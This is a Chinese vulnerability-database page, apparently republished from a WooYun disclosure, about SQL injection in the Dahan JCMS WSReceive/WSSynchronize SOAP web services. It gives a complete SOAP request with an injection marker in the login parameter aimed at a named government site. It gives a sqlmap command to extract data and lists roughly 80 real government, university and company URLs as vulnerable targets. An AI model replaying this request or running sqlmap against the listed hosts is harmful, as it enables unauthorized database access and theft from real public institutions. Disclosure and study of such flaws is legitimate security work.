|大汉jcms多处SQL注入二(附80个案例) - VULHUB开源网络安全威胁库

大汉jcms多处SQL注入二(附80个案例)

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：一类很明显，但目前不容易发现的漏洞 ### 详细说明： webservice 漏洞，目前非常多的系统均有该service 恰巧的是，该service的漏洞，是不被人注意的，因而教容易产生漏洞 /jcms/services/WSReceive?wsdl 下图的多个方法，方法中的多个参数均存在注入 [<img src="https://images.seebug.org/upload/201501/04202015188133831fa9066379c3c339618dae7c.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/04202015188133831fa9066379c3c339618dae7c.jpg) 随便选取一个方法进行测试 /jcms/services/WSReceive?wsdl wsGetColumn方法用WSockExpert v0.7抓包，并保存为wooyun.txt [<img src="https://images.seebug.org/upload/201501/042022090ed626266d864fad5fcf89eadf47347a.jpg" alt="00.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/042022090ed626266d864fad5fcf89eadf47347a.jpg) ``` POST /jcms/services/WSReceive?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 121 Host: www.wugang.gov.cn Connection: Keep-Alive User-Agent: google <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms"> <soapenv:Header/> <soapenv:Body> <rec:wsGetColumn soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <strWebId xsi:type="xsd:string">wooyun</strWebId> <strLoginId xsi:type="xsd:string">wooyun*</strLoginId> <strPwd xsi:type="xsd:string">wooyun</strPwd> <strKey xsi:type="xsd:string">wooyun</strKey> </rec:wsGetColumn> </soapenv:Body> </soapenv:Envelope> ``` www.wugang.gov.cn [<img src="https://images.seebug.org/upload/201501/04202316b0f2b1f93ba3685fbca3582ee2a25fbb.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/04202316b0f2b1f93ba3685fbca3582ee2a25fbb.jpg) www.cshtz.gov.cn [<img src="https://images.seebug.org/upload/201501/042025230eb070d6b0654f293f4cd5aec5087d1f.jpg" alt="a.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/042025230eb070d6b0654f293f4cd5aec5087d1f.jpg) www.njqh.gov.cn [<img src="https://images.seebug.org/upload/201501/04202730895f426327c8b8385975666d3428b3c4.jpg" alt="aa.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/04202730895f426327c8b8385975666d3428b3c4.jpg) www.sihong.gov.cn [<img src="https://images.seebug.org/upload/201501/04203042267290660debaeb65eafd1b0350959e7.jpg" alt="aaa.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/04203042267290660debaeb65eafd1b0350959e7.jpg) 可以直接用SQLMAP跑出的数据 sqlmap.py -r wooyun.txt [<img src="https://images.seebug.org/upload/201501/042031176a726a8f948e4c9a7e58e8022700f61b.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/042031176a726a8f948e4c9a7e58e8022700f61b.jpg) 案例： http://www.changde.gov.cn/jcms/services/WSReceive?wsdl http://www.cshtz.gov.cn/jcms/services/WSReceive?wsdl http://www.njqh.gov.cn/jcms/service/WSSynchronize?wsdl http://www.lg.gov.cn/jcms/service/WSSynchronize?wsdl http://gzw.zj.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sqsc.gov.cn/jcms/service/WSSynchronize?wsdl http://www.dongtai.gov.cn/jcms/services/WSReceive?wsdl http://www.sdfgw.gov.cn/jcms/service/WSSynchronize?wsdl http://ipad.zaozhuang.gov.cn/jcms/service/WSSynchronize?wsdl http://www.taizhou.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sihong.gov.cn/jcms/services/WSReceive?wsdl http://ggzy.jinan.gov.cn/jcms/services/WSReceive?wsdl http://www.wugang.gov.cn/jcms/services/WSReceive?wsdl http://www.gzlps.gov.cn/jcms/services/WSReceive?wsdl http://www.zpgt.gov.cn/jcms/services/WSReceive?wsdl http://www.taojiang.gov.cn/jcms/services/WSReceive?wsdl http://tz.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.huimin.gov.cn/jcms/service/WSSynchronize?wsdl http://autoweb.zjwst.gov.cn/jcms2.5//services/WSSynchronize?wsdl http://www.cncn.gov.cn/jcms/services/WSReceive?wsdl http://jsxy.zucc.edu.cn/jcms/services/WSReceive?wsdl http://www.gzdpc.gov.cn//jcms/services/WSReceive?wsdl http://www.ceec.net.cn/jcms/services/WSReceive?wsdl http://www.lixia.gov.cn/jcms/services/WSReceive?wsdl http://www.jinhua.gov.cn/jcms/services/WSReceive?wsdl http://zzb.10.gov.cn/jcms/services/WSReceive?wsdl http://www.ninghai.gov.cn/jcms/services/WSReceive?wsdl http://www.sihong.gov.cn/jcms/services/WSReceive?wsdl http://www.jining.gov.cn/jcms/services/WSReceive?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSReceive?wsdl http://www.zgzhijiang.gov.cn/jcms/services/WSReceive?wsdl http://www.hzgjj.gov.cn/jcms/services/WSReceive?wsdl http://anxiang.gov.cn/jcms/services/WSReceive?wsdl http://jcms.nantong.gov.cn/jcms/services/WSReceive?wsdl http://www.geta.gov.cn/jcms/services/WSReceive?wsdl http://pub.jsds.gov.cn/jcms/services/WSReceive?wsdl http://www.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSReceive?wsdl http://www.nbxsws.gov.cn/jcms/services/WSReceive?wsdl http://www.jsforestry.gov.cn/jcms/services/WSReceive?wsdl http://www.lc-news.com/jcms/services/WSReceive?wsdl http://www.xinghua.gov.cn/jcms/services/WSReceive?wsdl http://autoweb.zjwst.gov.cn/jcms2.5/services/WSSynchronize?wsdl http://www.jinxiang.gov.cn/jcms/services/WSReceive?wsdl http://www.sdxm.gov.cn/jcms25/service/WSSynchronize?wsdl http://www.xwzf.gov.cn/jcms24/service/WSSynchronize?wsdl http://www.zjdpc.gov.cn/jcms/services/WSReceive?wsdl http://www.jskx.org.cn/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.jdxc.net/jcms/service/WSSynchronize?wsdl http://sfl.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://nyyey.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://edu.tcjmxx.cn/jcms/service/WSSynchronize?wsdl http://www.haiyan.gov.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://xjco.cscec.com/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/service/WSSynchronize?wsdl http://njzx.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.weihai.gov.cn/jcms/service/WSSynchronize?wsdl http://www.rongcheng.gov.cn/jcms/service/WSSynchronize?wsdl http://www.yidu.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tzhl.gov.cn/jcms/service/WSSynchronize?wsdl http://www.cxyx.cn/jcms/service/WSSynchronize?wsdl http://www.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.yzu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.gzwd.gov.cn/jcms/services/WSReceive?wsdl http://www.sdfda.gov.cn/jcms/services/WSReceive?wsdl http://www.czzl.gov.cn/jcms/services/WSReceive?wsdl http://yxy.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://www.bisu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.nanxun.gov.cn/jcms/services/WSReceive?wsdl http://www.sheshantravel.com/jcms/services/WSReceive?wsdl http://sha.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/services/WSReceive?wsdl http://fx.10.gov.cn/jcms/services/WSReceive?wsdl ### 漏洞证明： [<img src="https://images.seebug.org/upload/201501/042031176a726a8f948e4c9a7e58e8022700f61b.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/042031176a726a8f948e4c9a7e58e8022700f61b.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™